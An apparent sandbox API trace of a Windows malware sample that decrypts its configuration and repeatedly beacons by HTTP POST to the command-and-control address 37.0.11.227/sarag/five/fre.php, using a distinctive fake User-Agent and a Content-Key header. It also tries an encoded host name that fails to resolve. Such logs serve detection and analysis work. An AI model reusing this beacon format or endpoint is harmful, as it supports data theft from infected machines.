(lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0248.176] GetProcessHeap () returned 0x690000 [0248.176] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0248.176] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0248.177] GetProcessHeap () returned 0x690000 [0248.177] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0248.177] GetProcessHeap () returned 0x690000 [0248.177] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0248.177] GetProcessHeap () returned 0x690000 [0248.177] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0248.177] GetProcessHeap () returned 0x690000 [0248.177] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0248.180] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0248.180] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0248.184] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0248.185] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0248.195] GetProcessHeap () returned 0x690000 [0248.195] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0248.196] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0248.196] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0248.197] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0248.198] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0248.198] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0248.201] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0248.201] GetProcessHeap () returned 0x690000 [0248.201] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0248.202] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0248.202] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0248.203] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0248.203] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0248.204] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0248.205] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0248.205] GetProcessHeap () returned 0x690000 [0248.205] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0248.205] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0248.206] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0248.207] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0248.207] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0248.208] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0248.208] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0248.209] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0248.209] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0248.209] GetProcessHeap () returned 0x690000 [0248.209] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0248.209] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0248.209] GetProcessHeap () returned 0x690000 [0248.209] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab470 [0248.209] socket (af=2, type=1, protocol=6) returned 0x6dc [0248.209] connect (s=0x6dc, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0248.235] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0248.235] GetProcessHeap () returned 0x690000 [0248.235] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af078 [0248.235] GetProcessHeap () returned 0x690000 [0248.235] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0248.236] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0248.237] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0248.237] GetProcessHeap () returned 0x690000 [0248.237] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6aff80 [0248.237] GetProcessHeap () returned 0x690000 [0248.237] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0248.237] GetProcessHeap () returned 0x690000 [0248.237] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0248.237] GetProcessHeap () returned 0x690000 [0248.237] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0248.238] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0248.239] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0248.239] GetProcessHeap () returned 0x690000 [0248.239] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0248.239] GetProcessHeap () returned 0x690000 [0248.239] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0248.239] send (s=0x6dc, buf=0x6ad508*, len=242, flags=0) returned 242 [0248.239] send (s=0x6dc, buf=0x6aba40*, len=159, flags=0) returned 159 [0248.240] GetProcessHeap () returned 0x690000 [0248.240] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0248.240] recv (in: s=0x6dc, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0248.313] GetProcessHeap () returned 0x690000 [0248.314] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0248.314] GetProcessHeap () returned 0x690000 [0248.314] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0248.314] GetProcessHeap () returned 0x690000 [0248.315] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aff80 | out: hHeap=0x690000) returned 1 [0248.315] GetProcessHeap () returned 0x690000 [0248.315] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af078 | out: hHeap=0x690000) returned 1 [0248.315] closesocket (s=0x6dc) returned 0 [0248.316] GetProcessHeap () returned 0x690000 [0248.316] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab470 | out: hHeap=0x690000) returned 1 [0248.316] GetProcessHeap () returned 0x690000 [0248.316] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0248.316] GetProcessHeap () returned 0x690000 [0248.317] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0248.317] GetProcessHeap () returned 0x690000 [0248.317] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0248.317] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1434) returned 0x6dc [0248.318] Sleep (dwMilliseconds=0xea60) [0248.321] GetProcessHeap () returned 0x690000 [0248.321] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a3fe0 [0248.322] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0248.322] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0248.327] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0248.327] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeee0) returned 1 [0248.333] GetProcessHeap () returned 0x690000 [0248.333] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0248.333] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0248.334] CryptImportKey (in: hProv=0x6aeee0, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0248.334] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0248.335] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0248.335] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0248.335] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0248.335] GetProcessHeap () returned 0x690000 [0248.336] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0248.336] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0248.337] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a3fe0, pdwDataLen=0x19fcfc | out: pbData=0x6a3fe0, pdwDataLen=0x19fcfc) returned 1 [0248.337] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0248.338] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0248.338] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0248.339] CryptReleaseContext (hProv=0x6aeee0, dwFlags=0x0) returned 1 [0248.339] GetProcessHeap () returned 0x690000 [0248.339] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0248.339] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0248.340] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0248.340] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0248.341] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0248.341] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0248.344] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0248.345] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0248.345] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0248.345] GetProcessHeap () returned 0x690000 [0248.346] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0248.346] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0248.346] GetProcessHeap () returned 0x690000 [0248.346] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0248.346] GetProcessHeap () returned 0x690000 [0248.347] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0248.347] GetProcessHeap () returned 0x690000 [0248.347] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0248.347] GetProcessHeap () returned 0x690000 [0248.347] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0248.348] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0248.349] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0248.358] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0248.358] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0248.368] GetProcessHeap () returned 0x690000 [0248.368] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0248.368] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0248.369] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0248.370] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0248.370] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0248.370] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0248.371] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0248.371] GetProcessHeap () returned 0x690000 [0248.371] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0248.372] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0248.372] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0248.373] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0248.373] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0248.374] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0248.374] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0248.374] GetProcessHeap () returned 0x690000 [0248.374] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0248.375] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0248.375] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0248.376] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0248.376] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0248.377] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0248.377] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0248.378] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0248.378] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0248.378] GetProcessHeap () returned 0x690000 [0248.378] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0248.378] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0248.378] GetProcessHeap () returned 0x690000 [0248.378] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab470 [0248.378] socket (af=2, type=1, protocol=6) returned 0x6e0 [0248.379] connect (s=0x6e0, name=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0248.410] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0248.410] GetProcessHeap () returned 0x690000 [0248.410] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aeff0 [0248.410] GetProcessHeap () returned 0x690000 [0248.410] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0248.411] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0248.411] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0248.411] GetProcessHeap () returned 0x690000 [0248.411] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af8c0 [0248.411] GetProcessHeap () returned 0x690000 [0248.412] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0248.412] GetProcessHeap () returned 0x690000 [0248.412] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4418 [0248.412] GetProcessHeap () returned 0x690000 [0248.412] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0248.413] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0248.414] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0248.414] GetProcessHeap () returned 0x690000 [0248.414] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ab500 [0248.414] GetProcessHeap () returned 0x690000 [0248.414] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0248.414] send (s=0x6e0, buf=0x6ab500*, len=242, flags=0) returned 242 [0248.415] send (s=0x6e0, buf=0x6aba40*, len=159, flags=0) returned 159 [0248.415] GetProcessHeap () returned 0x690000 [0248.415] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0248.415] recv (in: s=0x6e0, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0248.588] GetProcessHeap () returned 0x690000 [0248.588] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0248.588] GetProcessHeap () returned 0x690000 [0248.589] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0248.589] GetProcessHeap () returned 0x690000 [0248.589] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af8c0 | out: hHeap=0x690000) returned 1 [0248.589] GetProcessHeap () returned 0x690000 [0248.590] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeff0 | out: hHeap=0x690000) returned 1 [0248.590] closesocket (s=0x6e0) returned 0 [0248.590] GetProcessHeap () returned 0x690000 [0248.590] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab470 | out: hHeap=0x690000) returned 1 [0248.590] GetProcessHeap () returned 0x690000 [0248.591] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0248.591] GetProcessHeap () returned 0x690000 [0248.591] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0248.591] GetProcessHeap () returned 0x690000 [0248.591] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0248.592] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1438) returned 0x6e0 [0248.593] Sleep (dwMilliseconds=0xea60) [0248.595] GetProcessHeap () returned 0x690000 [0248.595] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0248.595] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0248.596] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0248.604] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0248.604] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0248.613] GetProcessHeap () returned 0x690000 [0248.613] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0248.614] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0248.615] CryptImportKey (in: hProv=0x6af078, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0248.615] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0248.616] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0248.616] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0248.623] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0248.623] GetProcessHeap () returned 0x690000 [0248.623] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0248.624] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0248.625] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0248.625] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0248.626] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0248.626] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0248.627] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0248.627] GetProcessHeap () returned 0x690000 [0248.627] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0248.628] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0248.628] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0248.629] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0248.629] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0248.630] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0248.630] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0248.631] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0248.632] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0248.632] GetProcessHeap () returned 0x690000 [0248.632] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0248.632] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0248.632] GetProcessHeap () returned 0x690000 [0248.632] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0248.633] GetProcessHeap () returned 0x690000 [0248.633] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0248.633] GetProcessHeap () returned 0x690000 [0248.633] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0248.633] GetProcessHeap 